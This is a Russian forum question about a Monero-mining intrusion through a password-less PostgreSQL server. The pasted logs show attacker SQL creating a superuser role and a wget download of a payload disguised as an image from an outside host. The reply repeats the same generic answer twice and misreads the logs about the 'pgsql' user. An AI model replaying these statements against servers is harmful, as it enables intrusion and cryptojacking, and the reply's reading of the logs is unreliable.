Как работает вирус monero распространяемый через postgresql? Открыл я как-то postgesql сервер на все соединения 0.0.0.0/0 trust т.е. заходи кто хочешь без пароля. И вот что появилось в логах [18419-1] postgres@postgres ERROR: large object 4000006040 does not exist [18419-2] postgres@postgres STATEMENT: select lo_unlink(4000006040) [18419-3] postgres@postgres ERROR: function obj4000006040(bigint, unknown) does not exist at character 8 [18419-4] postgres@postgres HINT: No function matches the given name and argument types. You might need to add explicit type casts. [18419-5] postgres@postgres STATEMENT: select obj4000006040(4000006040, './tmp4000006040'); WARNING: you should run this program as super-user. WARNING: output may be incomplete or inaccurate, you should run this program as super-user. [18419-6] postgres@postgres ERROR: role "e894c9c8" already exists [18419-7] postgres@postgres STATEMENT: CREATE ROLE E894C9C8 LOGIN ENCRYPTED PASSWORD 'md51351dbb7fe95c1f277282bc842cb3d6b' SUPERUSER CREATEDB CREATEROLE REPLICATION VALID UNTIL 'infinity'; [18419-8] postgres@postgres ERROR: role "e894c9c8" already exists [18419-9] postgres@postgres STATEMENT: CREATE ROLE E894C9C8 LOGIN ENCRYPTED PASSWORD 'md51351dbb7fe95c1f277282bc842cb3d6b' SUPERUSER CREATEDB CREATEROLE VALID UNTIL 'infinity';img1.imagehousing.com/0/art-981754.png Resolving img1.imagehousing.com (img1.imagehousing.com)... 104.27.181.36, 104.27.180.36, 2400:cb00:2048:1::681b:b424, ... Connecting to img1.imagehousing.com (img1.imagehousing.com)|104.27.181.36|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 517120 (505K) [image/png] Saving to: ‘flagdspo.jpg’ 0K .......... .......... .......... .......... .......... 9% 40.9M 0s 50K .......... .......... .......... .......... .......... 19% 89.3M 0s 100K .......... .......... .......... .......... .......... 29% 66.1M 0s 150K .......... .......... .......... .......... .......... 39% 137M 0s 200K .......... .......... .......... .......... .......... 49% 65.9M 0s 250K .......... .......... .......... .......... .......... 59% 77.2M 0s 300K .......... .......... .......... .......... .......... 69% 88.6M 0s 350K .......... .......... .......... .......... .......... 79% 83.7M 0s 400K .......... .......... .......... .......... .......... 89% 136M 0s 450K .......... .......... .......... .......... .......... 99% 76.2M 0s 500K ..... 100% 143M=0.006s (77.4 MB/s) - ‘flagdspo.jpg’ saved [517120/517120] 496464+0 records in 496464+0 records out 496464 bytes (496 kB, 485 KiB) copied, 0.554038 s, 896 kB/s [29796-10] postgres@postgres ERROR: role "pgsql" does not exist [29796-11] postgres@postgres STATEMENT: DROP USER pgsql; В папке /tmp/ появился файл 4000006040 который является monero клиентом скаченным с официального репозитория в гитхаб. Вопрос собственно что это за команды, и как этот файл там появился, из логов я не совсем понимаю что за функция obj4000006040, ее наличие все бы прояснило. В интернете не нашел описания такого метода распространения.
Этот вирус, распространяемый через PostgreSQL, использует уязвимость в вашем сервере, который открыт на все соединения без пароля. Как видно из логов, вирус создает новые роли и выполняет различные SQL запросы, включая создание нового пользователя "pgsql" и его удаление.
Файл 4000006040, который появился в папке /tmp/, является Monero майнером, который начинает майнить криптовалюту Monero на вашем сервере. Это делается без вашего разрешения и может привести к значительному увеличению загрузки сервера и потреблению ресурсов.
Функция obj4000006040, о которой идет речь в логах, скорее всего является частью вируса, который использует эту функцию для выполнения своих действий.
Чтобы защитить свой сервер от подобных атак, рекомендуется закрыть доступ к серверу только для авторизованных пользователей, использовать надежные пароли и регулярно обновлять ПО на сервере. Также следует проверить систему на наличие вредоносных программ и удалить все подозрительные файлы и процессы.
Этот вирус, распространяемый через PostgreSQL, использует уязвимость в вашем сервере, который открыт на все соединения без пароля. Как видно из логов, вирус создает новые роли и выполняет различные SQL запросы, включая создание нового пользователя "pgsql" и его удаление.
Файл 4000006040, который появился в папке /tmp/, является Monero майнером, который начинает майнить криптовалюту Monero на вашем сервере. Это делается без вашего разрешения и может привести к значительному увеличению загрузки сервера и потреблению ресурсов.
Функция obj4000006040, о которой идет речь в логах, скорее всего является частью вируса, который использует эту функцию для выполнения своих действий.
Чтобы защитить свой сервер от подобных атак, рекомендуется закрыть доступ к серверу только для авторизованных пользователей, использовать надежные пароли и регулярно обновлять ПО на сервере. Также следует проверить систему на наличие вредоносных программ и удалить все подозрительные файлы и процессы.